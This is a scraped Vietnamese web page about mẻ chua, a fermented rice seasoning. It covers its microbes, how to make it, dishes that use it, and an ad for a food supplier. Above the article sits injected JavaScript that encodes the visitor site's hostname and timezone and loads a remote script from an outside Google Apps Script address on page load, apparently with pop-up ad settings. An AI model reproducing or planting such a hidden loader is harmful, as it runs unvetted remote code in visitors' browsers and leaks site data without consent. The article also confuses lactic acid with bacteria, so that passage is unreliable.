var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Mẻ Chua gia vị đặc biệt khử đi vị tanh dùng phổ biến

Mẻ Chua là một trong những gia vị đặc biệt. Hầu hết người ta sử dụng loại gia vị này để khử đi vị tanh của các loại thủy hải sản như tôm, cua, cá giúp món ăn trở nên thơm và ngon hơn. Tuy nhiên nhiều người cũng thắc mắc không biết nếu thường xuyên sử dụng chúng sẽ mang lại những lợi ích gì? Để khám phá những công dụng của loại gia vị này, mình mời bạn theo dõi bài viết sau!

Đôi nét về mẻ chua

Mẻ chua là một trong những nguyên liệu hiếm hoi được chế xuất từ gạo mà có sức hút lan tỏa mãnh liệt, được nhiều người dân Việt Nam tin dùng. Hiện nay mẻ chua đã có mặt ở hầu hết 63 tỉnh thành cả nước, thậm chí chúng còn được xuất khẩu sang các nước Châu Âu.

Đặc điểm của mẻ chua

Mẻ chua là gì?

Mẻ chua là một loại nguyên liệu dân dã, có vị chua do gạo được lên men, chúng cũng có mùi thơm đặc trưng của gạo. Hơn nữa, trong mẻ chua còn chứa rất nhiều dinh dưỡng, chất đạm, vitamin và các loại acid lactic rất tốt cho đường ruột, loại acid này thường xuất hiện trong quá trình muối dưa, rau củ.

Nguồn gốc từ đâu?

Theo như lời kể của nghệ nhân làm mẻ, loại nguyên liệu này có nguồn gốc từ miền Bắc. Ban đầu người ta chỉ sử dụng những thành phẩm từ cơm thừa hoặc bún làm nguyên liệu sản xuất mẻ chua, vì thế ngày xưa, nó là một gia vị dân dã, dễ kiếm, giá thành rẻ.

Mẻ chua có những gì?

Trong cơm mẻ có chứa các nấm men, vi khuẩn acid lactic và con mẻ, chúng đều là những dưỡng chất bổ dưỡng có lợi cho tiêu hóa. Theo như kết quả nghiên cứu của các sinh viên tại đại học Y, bản chất con mẻ là một dạng tuyến trùng, chúng có tên tiếng anh là Panagrellus redivivus, con vi trùng này có kích thước nguyên vi, bạn sẽ không thể thấy chúng bằng mắt thường.

Thành phần dinh dưỡng của mẻ chua

Con mẻ sẽ ngọ nguậy trên bề mặt của những hũ mẻ chua và ăn những hạt nấm men để sản sinh ra protein, vì thế chúng có chức năng là hỗ trợ dinh dưỡng. Ngoài con mẻ, nấm men cũng là một yếu tố chính giúp mẻ lên men, nuôi dưỡng con mẻ. Từ việc lên men của tinh bột, vi khuẩn lactic được hình thành, chúng là một thành phần chính giúp mẻ có vị chua.

Bản chất của acid lactic là một chuỗi trực khuẩn Gram dương, những con vi trùng này sinh sôi trong môi trường giàu chất dinh dưỡng và rất kỵ khí vì vậy khi làm mẻ chua tuyệt đối không được cho không khí thâm nhập vào bên trong nếu không mẻ sẽ bị hỏng, có thể gây ngộ độc.

Các con trực khuẩn Gram dương này đã kích thích hệ tiêu hóa chúng ta, giúp bạn có cảm giác ăn ngon miệng hơn, không bị đầy hơi, chúng sẽ làm ức chế các con vi khuẩn có hại như Escherichia coli và Salmonella, từ đó bảo vệ được đường ruột của chúng ta thêm khỏe mạnh.

Cách làm

Mẻ chua là một trong những gia vị dễ làm nhất, ngày xưa, các bà nội trợ chỉ cần một hũ sành sứ, thêm một ít cơm nguội, bỏ vào một ít men là đã có ngay món mẻ chua đúng vị. Tuy nhiên, trong quá trình làm bạn phải để ý đến điều kiện an toàn thực phẩm, vậy nên dưới đây là cách mà chúng tôi sản xuất ra mẻ chua thơm ngon chính hiệu.

Cách làm mẻ chua

Bước chuẩn bị nguyên liệu

Thông thường chúng tôi sẽ sử dụng những chiếc lọ thuỷ tinh hoặc các hũ lớn được làm từ sứ chứ không sử dụng các loại thùng hay hộp nhựa bởi chúng sẽ làm món mẻ chua bị biến vị, không tốt cho sức khỏe.

Nguyên liệu tiếp theo mà chúng tôi chuẩn bị là những con mẻ cái. Đây là một trong những thành phần khó kiếm nhất vì thế đôi khi chúng tôi xử lý bằng cách tự làm ra mẻ cái.

Sử dụng sẵn mẻ cái để lên men

Nhiều người thắc mắc: vậy mẻ cái là gì? Theo dân gian, mẻ cái chính là phần cơm mẻ đã được lên men hay còn gọi là đã ngấu, bạn có thể mua chúng ngoài chợ hoặc tự làm. Tuy nhiên thời gian làm phần cơm mẻ rất kỳ công, tốn thời gian nên khi làm bạn hãy cân nhắc.

Sau khi đã có mẻ cái, bạn sẽ để chúng vào một chiếc nồi, đậy lại, không được đậy quá kín, chúng sẽ tự lên men và phân hủy. Một thời gian sau, bạn sẽ mang chúng ra kiểm tra nếu thấy phần cơm có màu trắng đục và có mùi chua nhẹ là món mẻ chua đã hoàn thành.

Cách làm mẻ chua không sử dụng mẻ cái

Bước 1: Lấy gạo đem đi vo sạch, sau đó đổ vào một chiếc nồi, thêm nước ( nhớ lấy nhiều nước hơn mức bình thường khi nấu cơm)

Bước 2: Đợi khi cơm sôi, chắt lấy phần nước cơm để nguội

Bước 3: Phần cơm chín được múc ra bát riêng, cũng để cho chúng nguội, trộn với các hạt nấm men. Sau đó, đổ chúng vào hũ và đổ thêm phần nước cơm vào sao cho nó mực nước bằng với lượng cơm có trong hũ.

Bước 4: Đậy kín phần miệng hũ, để chúng ở những nơi khô ráo, để tránh ánh nắng, gió làm vi khuẩn có hại bên ngoài xâm nhập.

Bước 5: Sau khoảng 7 – 10 ngày, bạn hãy kiểm tra xem cơm mẻ đã lên men chưa, nếu có vị chua tức là đã hoàn thành.

Lưu ý

Trong quá trình tự làm cơm mẻ bạn cần chú ý những điểm sau:

  • Các thao tác phải được làm đúng chuẩn. Trước khi tiếp xúc trực tiếp với cơm, bạn phải đảm bảo rằng tay hoàn toàn sạch sẽ.
  • Trong quá trình trộn cơm với nấm men, bạn nên bóp nát cục men hoặc dã chúng ra cho đều, thật nhỏ, vụn sau đó mới rắc lên cơm, đồng thời lấy tay đảo đều.
  • Nếu làm mẻ chua từ việc mua sẵn cơm mẻ ngoài chợ thì bạn cần phải chọn được cơ sở uy tín, tránh trường hợp mua phải những hũ cơm mẻ đã bị nhiễm khuẩn, bị hỏng, sẽ làm ảnh hưởng đến chất lượng của mẻ chua và sức khỏe của mọi người.
  • Khi kiểm tra hũ mẻ chua bạn cần lấy một phần cơm mẻ đã rất ngấu để xem, hoặc nếu mắt thấy những con mẻ đang bò lên thành hũ thì phải bổ sung ngay phần cơm nguội để tiếp tục nuôi hũ mẻ.

Cách nuôi mẻ cái

  • Bạn cũng có thể thêm giềng, nghệ, chân gà, xương lợn để tăng được hương vị cho hũ mẻ chua thêm thơm ngon, bổ dưỡng.
  • Thời gian sử dụng mẻ có thể lên đến vài tháng tùy thuộc vào chất lượng con mẻ và cách chăm của người dùng.

Ứng dụng của mẻ chua trong đời sống

So với giấm, mẻ chua có phần thơm ngon hơn, hơi có vị ngọt và khả năng khử tăng rất tốt nên chúng thường được dùng để nấu kèm theo các món thịt chó, các món lẩu canh cá, lẩu bò, lẩu dê hoặc các món om như vịt om mẻ chua,…

Trong danh sách các món ăn dân giã của Việt Nam, thịt chó luôn là cái tên được nhiều người nhắc đến. Thông thường bạn chỉ nghe nói đến công thức thịt chó nấu nhựa mận kèm riềng, mắm tôm và mẻ chua mà ít ai hiểu được rằng tại sao lại xuất hiện ra cách nấu này. Theo lý giải của những người sành ăn thịt chó cho hay: phần mẻ chua khi được nấu chung với phần thịt chó sẽ làm cho chúng giảm bớt được độ dai, thịt sẽ được mềm, thơm ngon và dễ ngấm gia vị mắm muối hơn.

Bởi trong thành phần của mẻ có chứa acid lactic, chúng sẽ làm cấu trúc của phần thịt được giãn ra, các tế bào nước, gia vị mắm muối sẽ dễ dàng lấp vào các khoảng trống đó, vì vậy khi ăn những miếng nhựa mận bạn sẽ cảm thấy thơm ngon, ngọt, mềm.

Ứng dụng tuyệt vời của mẻ chua

Theo công thức dân gian, riềng và mẻ là một sự kết hợp ăn ý: một cái thì có vị cay nồng, nồng, rất thơm, trong khi loại gia vị còn lại thì có tính chua, mát, chúng sẽ làm cho món ăn của bạn thêm dậy mùi, kích thích được vị giác, từ đó bạn sẽ cảm thấy ngon miệng hơn.

Mẻ chua cũng thường được dùng để nấu các món nướng, om, gỏi. Nếu bạn đã từng nghe ai đó nhắc đến món chả cá Lã Vọng thì chắc chắn sẽ biết công thức của món ăn thơm ngon này bắt nguồn từ mẻ chua. Phần thịt cá sau khi được xay nhuyễn, ướp với phần mẻ sẽ có mùi thơm khó cưỡng, làm cái bụng của bạn sôi lên.

Ngoài ra, mẻ chua cũng thường được sử dụng trong các món lẩu, bạn sẽ thường bắt gặp các món lẩu cua đồng, lẩu ốc ăn kèm đậu phụ chuối xanh, lẩu thịt dê hay lẩu trâu, thậm chí là lẩu gà. Khi thưởng thức các món ăn này, bạn sẽ cảm nhận được một vị thơm đặc trưng của mẻ được hòa quyện với các gia vị khác, chắc chắn bạn sẽ không thể cưỡng lại được.

Bạn cũng sẽ thường xuyên bắt gặp những món nước chấm có thành phần chính từ mẻ chua. Chúng sẽ được kết hợp với sả, ớt, tỏi, riềng, thay thế cho đường, giấm. Loại nước chấm đặc biệt này sẽ được sử dụng trong những món ăn như: ốc luộc, cá rán, cá hấp,…

Mẻ chua giúp món ăn thêm hấp dẫn

Hơn nữa, mẻ chua còn được sử dụng như một thức ăn bổ dưỡng, giàu protein và trực khuẩn, nuôi lớn những chú cá bột. Thường thì, người dân sẽ chỉ lấy con mẻ, kết hợp với các nguyên liệu như cám, để cho cá ăn. Hoặc đôi khi bạn sẽ bắt gặp những người ngư dân câu cá, có sử dụng cả những phần mẻ chua trộn với mồi câu để bắt cá tra.

Thực Phẩm Đồng Xanh – địa chỉ cung cấp mẻ chua uy tín nhất cả nước

Để mua được mẻ chua chất lượng, đảm bảo vệ sinh an toàn thực phẩm thì bạn cần phải tìm được cơ sở phân phối uy tín. Hiện nay trên thị trường có rất nhiều cơ sở kinh doanh mẻ chua nhưng chất lượng chưa được kiểm định trong khi nhu cầu thị trường ngày càng cao.

Rau củ quả tươi, sạch

Chính vì vậy mà Thực Phẩm Đồng Xanh đã cho ra đời mặt hàng mẻ chua nhà làm. Sản phẩm này được làm theo một quy trình khép kín, chất lượng, được chứng nhận bởi bộ Y Tế.

Ngoài mẻ chua, chúng tôi còn phân phối cả các mặt hàng rau củ quả sạch, đạt chuẩn Vietgap. Để tham khảo các sản phẩm trên, bạn có thể ghé qua website: thucphamdongxanh.com hoặc trực tiếp gọi điện qua Hotline : 0936.68.52.68